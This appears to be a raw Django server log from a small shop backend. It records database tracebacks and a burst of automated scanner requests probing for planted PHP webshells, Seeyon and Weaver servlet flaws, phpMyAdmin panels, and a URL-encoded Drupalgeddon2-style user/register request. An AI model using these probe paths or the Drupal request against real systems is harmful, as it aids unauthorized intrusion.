(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:05:47,024 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla' LIMIT 21; args=('Joomla',) DEBUG 2019-11-29 22:05:47,025 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla' LIMIT 21; args=('Joomla',) DEBUG 2019-11-29 22:05:47,026 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla' LIMIT 21; args=('Joomla',) Internal Server Error: /Joomla/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 22:05:47] "GET /Joomla/ HTTP/1.0" 500 131440 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:05:48] "GET /xyzx/ShowClass.asp?ClassID=1&page=%C2%BC%C3%93%C3%89%C3%8F%C3%95%C3%BD%C3%96%C2%B5%C3%96%C3%9C%C3%84%C2%A9 HTTP/1.0" 404 6522 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:05:59] "GET /xyzx/ShowClass.asp?ClassID=1&page=%C3%8B%C3%B9%C3%92%C3%94%C3%8E%C3%92%C3%8B%C2%B5%C2%BD%C3%B0%C3%93%C2%B9%C2%B5%C3%84%C2%B8%C3%B9%C2%BE%C3%9D%C2%B1%C3%98%C2%B6%C2%A8%C3%8A%C3%87%C3%95%C3%A2%C3%86%C2%AA%C3%82%C3%9B%C3%8E%C3%84 HTTP/1.0" 404 6642 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:06:05] "GET /xyzx/ShowClass.asp?ClassID=1&page=%C3%8E%C2%A5%C2%B9%C3%A6%C2%BC%C3%B5%C2%B3%C3%96%C3%8A%C2%B1%C3%93%C3%90%C2%B7%C2%A2%C3%89%C3%BA%C2%B4%C3%B3%C2%B9%C3%89%C2%B6%C2%AB%C3%83%C3%9C%C2%BC%C2%AF%C2%BC%C3%B5%C2%B3%C3%96 HTTP/1.0" 404 6630 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:06:17] "GET /xyzx/ShowClass.asp?ClassID=1&page=%C3%97%C3%B2%C3%92%C2%B9%C3%90%C2%A1%C3%86%C3%9F%C3%89%C3%8F%C3%8C%C2%A8%C3%8A%C2%B1%C2%BF%C3%8C%C2%B2%C2%BB%C2%B3%C2%A4 HTTP/1.0" 404 6570 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:06:28] "GET /xyzx/ShowClass.asp?ClassID=1&page=%E3%80%8A HTTP/1.0" 404 6459 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:06:39] "GET /xyzx/ShowClass.asp?ClassID=1&page=%E5%8A%A0%E4%B8%8A%E6%AD%A3%E5%80%BC%E5%91%A8%E6%9C%AB HTTP/1.0" 404 6504 Not Found: /d7.php [29/Nov/2019 22:06:53] "GET /d7.php HTTP/1.0" 404 6393 [29/Nov/2019 22:06:54] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:06:58] "GET /xyzx/ShowClass.asp?ClassID=1&page=%E5%B8%A6%E5%92%B1%E4%BB%AC%E8%B5%B0%E8%BF%9B%E7%BD%91%E7%BA%A2%E7%9A%84%E5%9B%BD%E9%99%85 HTTP/1.0" 404 6540 Not Found: /1x.php [29/Nov/2019 22:07:04] "GET /1x.php HTTP/1.0" 404 6393 Not Found: /home.php [29/Nov/2019 22:07:07] "GET /home.php HTTP/1.0" 404 6399 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:07:09] "GET /xyzx/ShowClass.asp?ClassID=1&page=%E6%89%80%E4%BB%A5%E6%88%91%E8%AF%B4%E9%87%91%E5%BA%B8%E7%9A%84%E6%A0%B9%E6%8D%AE%E5%BF%85%E5%AE%9A%E6%98%AF%E8%BF%99%E7%AF%87%E8%AE%BA%E6%96%87 HTTP/1.0" 404 6594 Not Found: /undx.php [29/Nov/2019 22:07:17] "GET /undx.php HTTP/1.0" 404 6399 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:07:20] "GET /xyzx/ShowClass.asp?ClassID=1&page=%E6%98%A8%E5%A4%9C%E5%B0%8F%E4%B8%83%E4%B8%8A%E5%8F%B0%E6%97%B6%E5%88%BB%E4%B8%8D%E9%95%BF HTTP/1.0" 404 6540 Not Found: /spider.php [29/Nov/2019 22:07:22] "GET /spider.php HTTP/1.0" 404 6405 Not Found: /payload.php [29/Nov/2019 22:07:22] "GET /payload.php HTTP/1.0" 404 6408 Not Found: /composers.php [29/Nov/2019 22:07:23] "GET /composers.php HTTP/1.0" 404 6414 Not Found: /izom.php [29/Nov/2019 22:07:24] "GET /izom.php HTTP/1.0" 404 6399 Not Found: /composer.php [29/Nov/2019 22:07:26] "GET /composer.php HTTP/1.0" 404 6411 Not Found: /hue2.php [29/Nov/2019 22:07:30] "GET /hue2.php HTTP/1.0" 404 6399 Not Found: /Drupal.php [29/Nov/2019 22:07:30] "GET /Drupal.php HTTP/1.0" 404 6405 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:07:31] "GET /xyzx/ShowClass.asp?ClassID=1&page=%E7%99%BE%E5%AE%B6%E4%BA%89%E9%B8%A3%E7%9A%84%E6%96%B9%E9%92%88 HTTP/1.0" 404 6513 Not Found: /lang.php [29/Nov/2019 22:07:34] "GET /lang.php?f=1 HTTP/1.0" 404 6403 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:07:39] "GET /xyzx/ShowClass.asp?ClassID=1&page=%E8%BF%9D%E8%A7%84%E5%87%8F%E6%8C%81%E6%97%B6%E6%9C%89%E5%8F%91%E7%94%9F%E5%A4%A7%E8%82%A1%E4%B8%9C%E5%AF%86%E9%9B%86%E5%87%8F%E6%8C%81 HTTP/1.0" 404 6585 Not Found: /izom.php [29/Nov/2019 22:07:42] "GET /izom.php HTTP/1.0" 404 6399 Not Found: /payload.php [29/Nov/2019 22:07:43] "GET /payload.php HTTP/1.0" 404 6408 Not Found: /new_license.php [29/Nov/2019 22:07:43] "GET /new_license.php HTTP/1.0" 404 6420 Not Found: /images/!.php [29/Nov/2019 22:07:44] "GET /images/!.php HTTP/1.0" 404 6411 Not Found: /images/vuln.php [29/Nov/2019 22:07:45] "GET /images/vuln.php HTTP/1.0" 404 6420 Not Found: /hd.php [29/Nov/2019 22:07:45] "GET /hd.php HTTP/1.0" 404 6393 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:07:50] "GET /xyzx/ShowClass.asp?ClassID=2&page=54%C3%8D%C3%B2%C2%BF%C2%BC%C3%89%C3%BA%C2%BF%C3%89%C3%92%C3%94%C2%BD%C3%B8%C3%88%C3%AB211%C2%B8%C3%9F%C3%90%C2%A3 HTTP/1.0" 404 6563 Not Found: /images/up.php [29/Nov/2019 22:07:52] "GET /images/up.php HTTP/1.0" 404 6414 Not Found: /images/attari.php [29/Nov/2019 22:07:55] "GET /images/attari.php HTTP/1.0" 404 6426 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:08:01] "GET /xyzx/ShowClass.asp?ClassID=2&page=54%E4%B8%87%E8%80%83%E7%94%9F%E5%8F%AF%E4%BB%A5%E8%BF%9B%E5%85%A5211%E9%AB%98%E6%A0%A1 HTTP/1.0" 404 6536 Not Found: /images/jsspwneed.php [29/Nov/2019 22:08:10] "GET /images/jsspwneed.php HTTP/1.0" 404 6435 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:08:11] "GET /xyzx/ShowClass.asp?ClassID=%C2%BA%C3%9A%C3%89%C2%AB%C2%B5%C3%84%C2%B5%C3%98%C2%B5%C3%80%C2%BD%C2%AB%C2%BB%C2%AD%C3%83%C3%A6%C2%B5%C3%84%C2%BA%C3%9A%C3%89%C2%AB%C2%B0%C2%B5%C3%93%C2%B0%C3%93%C3%90%C3%90%C2%A9%C2%B3%C3%94%C2%B5%C3%B4&page=%C2%BA%C3%9A%C3%89%C2%AB%C2%B5%C3%84%C2%B5%C3%98%C2%B5%C3%80%C2%BD%C2%AB%C2%BB%C2%AD%C3%83%C3%A6%C2%B5%C3%84%C2%BA%C3%9A%C3%89%C2%AB%C2%B0%C2%B5%C3%93%C2%B0%C3%93%C3%90%C3%90%C2%A9%C2%B3%C3%94%C2%B5%C3%B4 HTTP/1.0" 404 6857 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:08:19] "GET /xyzx/ShowClass.asp?ClassID=%C3%95%C3%A2%C3%88%C3%83%C3%95%C3%85%C2%B4%C3%B3%C3%92%C2%AF%C3%8D%C3%AA%C3%88%C2%AB%C2%BF%C2%B4%C2%B4%C2%A9%C3%81%C3%8B%C3%90%C2%A1%C3%93%C2%B0%C2%B5%C3%84%C3%95%C3%A6%C3%83%C3%A6%C3%84%C2%BF&page=%C3%95%C3%A2%C3%88%C3%83%C3%95%C3%85%C2%B4%C3%B3%C3%92%C2%AF%C3%8D%C3%AA%C3%88%C2%AB%C2%BF%C2%B4%C2%B4%C2%A9%C3%81%C3%8B%C3%90%C2%A1%C3%93%C2%B0%C2%B5%C3%84%C3%95%C3%A6%C3%83%C3%A6%C3%84%C2%BF HTTP/1.0" 404 6833 Not Found: /images/stories/filemga.php [29/Nov/2019 22:08:26] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6464 Not Found: /laravel.php [29/Nov/2019 22:08:30] "GET /laravel.php HTTP/1.0" 404 6408 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:08:31] "GET /xyzx/ShowClass.asp?ClassID=%E8%BF%99%E8%AE%A9%E5%BC%A0%E5%A4%A7%E7%88%B7%E5%AE%8C%E5%85%A8%E7%9C%8B%E7%A9%BF%E4%BA%86%E5%B0%8F%E5%BD%B1%E7%9A%84%E7%9C%9F%E9%9D%A2%E7%9B%AE&page=%E8%BF%99%E8%AE%A9%E5%BC%A0%E5%A4%A7%E7%88%B7%E5%AE%8C%E5%85%A8%E7%9C%8B%E7%A9%BF%E4%BA%86%E5%B0%8F%E5%BD%B1%E7%9A%84%E7%9C%9F%E9%9D%A2%E7%9B%AE HTTP/1.0" 404 6737 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:08:40] "GET /xyzx/ShowClass.asp?ClassID=%E9%BB%91%E8%89%B2%E7%9A%84%E5%9C%B0%E9%81%93%E5%B0%86%E7%94%BB%E9%9D%A2%E7%9A%84%E9%BB%91%E8%89%B2%E6%9A%97%E5%BD%B1%E6%9C%89%E4%BA%9B%E5%90%83%E6%8E%89&page=%E9%BB%91%E8%89%B2%E7%9A%84%E5%9C%B0%E9%81%93%E5%B0%86%E7%94%BB%E9%9D%A2%E7%9A%84%E9%BB%91%E8%89%B2%E6%9A%97%E5%BD%B1%E6%9C%89%E4%BA%9B%E5%90%83%E6%8E%89 HTTP/1.0" 404 6755 Not Found: /xyzx/mailto:¸÷ÃüÌâ²ÎÈüС×éÐ뽫ÊÔÌâµç×Ó¸åÓÚ11ÔÂ30ǰ·¢ÖÁlmq@wzer.net [29/Nov/2019 22:08:50] "GET /xyzx/mailto:%C2%B8%C3%B7%C3%83%C3%BC%C3%8C%C3%A2%C2%B2%C3%8E%C3%88%C3%BC%C3%90%C2%A1%C3%97%C3%A9%C3%90%C3%AB%C2%BD%C2%AB%C3%8A%C3%94%C3%8C%C3%A2%C2%B5%C3%A7%C3%97%C3%93%C2%B8%C3%A5%C3%93%C3%9A11%C3%94%C3%8230%C3%87%C2%B0%C2%B7%C2%A2%C3%96%C3%81lmq@wzer.net HTTP/1.0" 404 6840 Not Found: /xyzx/mailto:各命题参赛小组须将试题电子稿于11月30前发至lmq@wzer.net [29/Nov/2019 22:09:06] "GET /xyzx/mailto:%E5%90%84%E5%91%BD%E9%A2%98%E5%8F%82%E8%B5%9B%E5%B0%8F%E7%BB%84%E9%A1%BB%E5%B0%86%E8%AF%95%E9%A2%98%E7%94%B5%E5%AD%90%E7%A8%BF%E4%BA%8E11%E6%9C%8830%E5%89%8D%E5%8F%91%E8%87%B3lmq@wzer.net HTTP/1.0" 404 6745 Not Found: /huoshan.php [29/Nov/2019 22:09:38] "GET /huoshan.php HTTP/1.0" 404 6408 Not Found: /yu.php [29/Nov/2019 22:09:38] "GET /yu.php HTTP/1.0" 404 6393 Not Found: /floaw.php [29/Nov/2019 22:09:39] "GET /floaw.php HTTP/1.0" 404 6402 Not Found: /ftmabc.php [29/Nov/2019 22:09:40] "GET /ftmabc.php HTTP/1.0" 404 6405 Not Found: /doudou.php [29/Nov/2019 22:09:40] "GET /doudou.php HTTP/1.0" 404 6405 Not Found: /mjx.php [29/Nov/2019 22:09:41] "GET /mjx.php HTTP/1.0" 404 6396 Not Found: /xiaoxia.php [29/Nov/2019 22:09:41] "GET /xiaoxia.php HTTP/1.0" 404 6408 Not Found: /yuyang.php [29/Nov/2019 22:09:42] "GET /yuyang.php HTTP/1.0" 404 6405 Not Found: /zz.php [29/Nov/2019 22:09:42] "GET /zz.php HTTP/1.0" 404 6393 Not Found: /coonig.php [29/Nov/2019 22:09:46] "GET /coonig.php HTTP/1.0" 404 6405 Not Found: /ak.php [29/Nov/2019 22:09:50] "GET /ak.php HTTP/1.0" 404 6393 Not Found: /baidoubi.php [29/Nov/2019 22:09:54] "GET /baidoubi.php HTTP/1.0" 404 6411 Not Found: /meijianxue.php [29/Nov/2019 22:10:03] "GET /meijianxue.php HTTP/1.0" 404 6417 Not Found: /no1.php [29/Nov/2019 22:10:03] "GET /no1.php HTTP/1.0" 404 6396 Not Found: /python.php [29/Nov/2019 22:10:04] "GET /python.php HTTP/1.0" 404 6405 Not Found: /woshimengmei.php [29/Nov/2019 22:10:04] "GET /woshimengmei.php HTTP/1.0" 404 6423 Not Found: /indea.php [29/Nov/2019 22:10:05] "GET /indea.php HTTP/1.0" 404 6402 Not Found: /taisui.php [29/Nov/2019 22:10:05] "GET /taisui.php HTTP/1.0" 404 6405 Not Found: /kk.php [29/Nov/2019 22:10:06] "GET /kk.php HTTP/1.0" 404 6393 Not Found: /xsser.php [29/Nov/2019 22:10:07] "GET /xsser.php HTTP/1.0" 404 6402 Not Found: /zzz.php [29/Nov/2019 22:10:09] "GET /zzz.php HTTP/1.0" 404 6396 Not Found: /dp.php [29/Nov/2019 22:10:26] "GET /dp.php HTTP/1.0" 404 6393 Not Found: /hs.php [29/Nov/2019 22:10:27] "GET /hs.php HTTP/1.0" 404 6393 Not Found: /1ts.php [29/Nov/2019 22:10:28] "GET /1ts.php HTTP/1.0" 404 6396 Not Found: /haiyan.php [29/Nov/2019 22:10:28] "GET /haiyan.php HTTP/1.0" 404 6405 Not Found: /root.php [29/Nov/2019 22:10:30] "GET /root.php HTTP/1.0" 404 6399 Not Found: /5678.php [29/Nov/2019 22:10:45] "GET /5678.php HTTP/1.0" 404 6399 Not Found: /root11.php [29/Nov/2019 22:10:46] "GET /root11.php HTTP/1.0" 404 6405 Not Found: /xiu.php [29/Nov/2019 22:10:46] "GET /xiu.php HTTP/1.0" 404 6396 Not Found: /wuwu11.php [29/Nov/2019 22:10:50] "POST /wuwu11.php HTTP/1.0" 404 6406 Not Found: /xw.php [29/Nov/2019 22:10:59] "POST /xw.php HTTP/1.0" 404 6394 Not Found: /9678.php [29/Nov/2019 22:11:08] "POST /9678.php HTTP/1.0" 404 6400 Not Found: /xx.php [29/Nov/2019 22:11:14] "POST /xx.php HTTP/1.0" 404 6394 Not Found: /xx.php [29/Nov/2019 22:11:26] "POST /xx.php HTTP/1.0" 404 6394 Not Found: /w.php [29/Nov/2019 22:11:39] "POST /w.php HTTP/1.0" 404 6391 Not Found: /qaq.php [29/Nov/2019 22:11:49] "POST /qaq.php HTTP/1.0" 404 6397 Not Found: /my.php [29/Nov/2019 22:11:55] "POST /my.php HTTP/1.0" 404 6394 [29/Nov/2019 22:12:01] "GET / HTTP/1.0" 302 0 Not Found: /aaa.php [29/Nov/2019 22:12:03] "POST /aaa.php HTTP/1.0" 404 6397 Not Found: /hhh.php [29/Nov/2019 22:12:05] "POST /hhh.php HTTP/1.0" 404 6397 Not Found: /jjj.php [29/Nov/2019 22:12:05] "POST /jjj.php HTTP/1.0" 404 6397 Not Found: /www.php [29/Nov/2019 22:12:07] "POST /www.php HTTP/1.0" 404 6397 Not Found: /ffr.php [29/Nov/2019 22:12:09] "POST /ffr.php HTTP/1.0" 404 6397 Not Found: /411.php [29/Nov/2019 22:12:10] "POST /411.php HTTP/1.0" 404 6397 Not Found: /415.php [29/Nov/2019 22:12:10] "POST /415.php HTTP/1.0" 404 6397 Not Found: /444.php [29/Nov/2019 22:12:19] "POST /444.php HTTP/1.0" 404 6397 Not Found: /whoami.php [29/Nov/2019 22:12:24] "POST /whoami.php HTTP/1.0" 404 6406 Not Found: /whoami.php.php [29/Nov/2019 22:12:26] "POST /whoami.php.php HTTP/1.0" 404 6418 Not Found: /9.php [29/Nov/2019 22:12:32] "POST /9.php HTTP/1.0" 404 6391 Not Found: /seeyon/htmlofficeservlet [29/Nov/2019 22:12:42] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6447 Not Found: /weaver/bsh.servlet.BshServlet [29/Nov/2019 22:12:50] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6462 Not Found: /user/register [29/Nov/2019 22:14:18] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6652 DEBUG 2019-11-29 22:14:26,959 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) DEBUG 2019-11-29 22:14:26,994 utils 26999 140702522537728 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 22:14:26,995 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:14:26,996 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:14:26,997 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-11-29 22:14:26,998 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:14:26,999 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-11-29 22:14:27,000 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-11-29 22:14:27,001 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) Internal Server Error: /joomla/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 22:14:27] "GET /joomla/ HTTP/1.0" 500 131401 Not Found: /user.php [29/Nov/2019 22:14:28] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6400 Not Found: /index.php [29/Nov/2019 22:14:39] "GET /index.php HTTP/1.0" 404 6402 Not Found: /phpmyadmin/index.php [29/Nov/2019 22:14:42] "GET /phpmyadmin/index.php HTTP/1.0" 404 6435 Not Found: /phpMyAdmin/index.php [29/Nov/2019 22:14:43] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6435 Not Found: /pmd/index.php [29/Nov/2019 22:14:53] "GET /pmd/index.php HTTP/1.0" 404 6414 Not Found: /pma/index.php [29/Nov/2019 22:14:55] "GET /pma/index.php HTTP/1.0" 404 6414 [29/Nov/2019 22:15:25] "GET / HTTP/1.0" 302 0 Not Found: /PMA/index.php [29/Nov/2019 22:16:24] "GET /PMA/index.php HTTP/1.0" 404 6414 Not Found: /PMA2/index.php [29/Nov/2019 22:16:31] "GET /PMA2/index.php HTTP/1.0" 404 6417 Not Found: /pmamy/index.php [29/Nov/2019 22:16:31] "GET /pmamy/index.php HTTP/1.0" 404 6420 Not Found: /mysql/index.php [29/Nov/2019 22:16:39] "GET /mysql/index.php HTTP/1.0" 404 6420 Not Found: /admin/index.php [29/Nov/2019 22:16:40] "GET /admin/index.php HTTP/1.0" 404 9027 Not Found: /db/index.php [29/Nov/2019 22:16:41] "GET /db/index.php HTTP/1.0" 404 6411 Not Found: /dbadmin/index.php [29/Nov/2019 22:16:41] "GET /dbadmin/index.php HTTP/1.0" 404 6426 Not Found: /admin/pma/index.php [29/Nov/2019 22:16:43] "GET /admin/pma/index.php HTTP/1.0" 404 9039 [29/Nov/2019 22:17:03] "GET / HTTP/1.0" 302 0 [29/Nov/2019 22:17:05] "GET / HTTP/1.0" 302 0 Not Found: /admin/mysql/index.php [29/Nov/2019 22:18:03] "GET /admin/mysql/index.php HTTP/1.0" 404 9045 Not Found: /admin/mysql2/index.php [29/Nov/2019 22:18:04] "GET /admin/mysql2/index.php HTTP/1.0" 404 9048 Not Found: /admin/phpmyadmin/index.php [29/Nov/2019 22:18:04] "GET /admin/phpmyadmin/index.php HTTP/1.0" 404 9060 Not Found: /admin/phpMyAdmin/index.php [29/Nov/2019 22:18:05] "GET /admin/phpMyAdmin/index.php HTTP/1.0" 404 9060 Not Found: /admin/phpmyadmin2/index.php [29/Nov/2019 22:18:08] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 9063 Not Found: /mysqladmin/index.php [29/Nov/2019 22:18:10] "GET /mysqladmin/index.php HTTP/1.0" 404 6435 Not Found: /mysql-admin/index.php [29/Nov/2019 22:18:11] "GET /mysql-admin/index.php HTTP/1.0" 404 6438 Not Found: /phpadmin/index.php [29/Nov/2019 22:18:17] "GET /phpadmin/index.php HTTP/1.0" 404 6429 Not Found: /phpAdmin/index.php [29/Nov/2019 22:18:18] "GET /phpAdmin/index.php HTTP/1.0" 404 6429 Not Found: /phpmyadmin0/index.php [29/Nov/2019 22:18:22] "GET /phpmyadmin0/index.php HTTP/1.0" 404 6438 Not Found: /phpmyadmin1/index.php [29/Nov/2019 22:18:23] "GET /phpmyadmin1/index.php HTTP/1.0" 404 6438 Not Found: /phpmyadmin2/index.php [29/Nov/2019 22:18:26] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6438 Not Found: 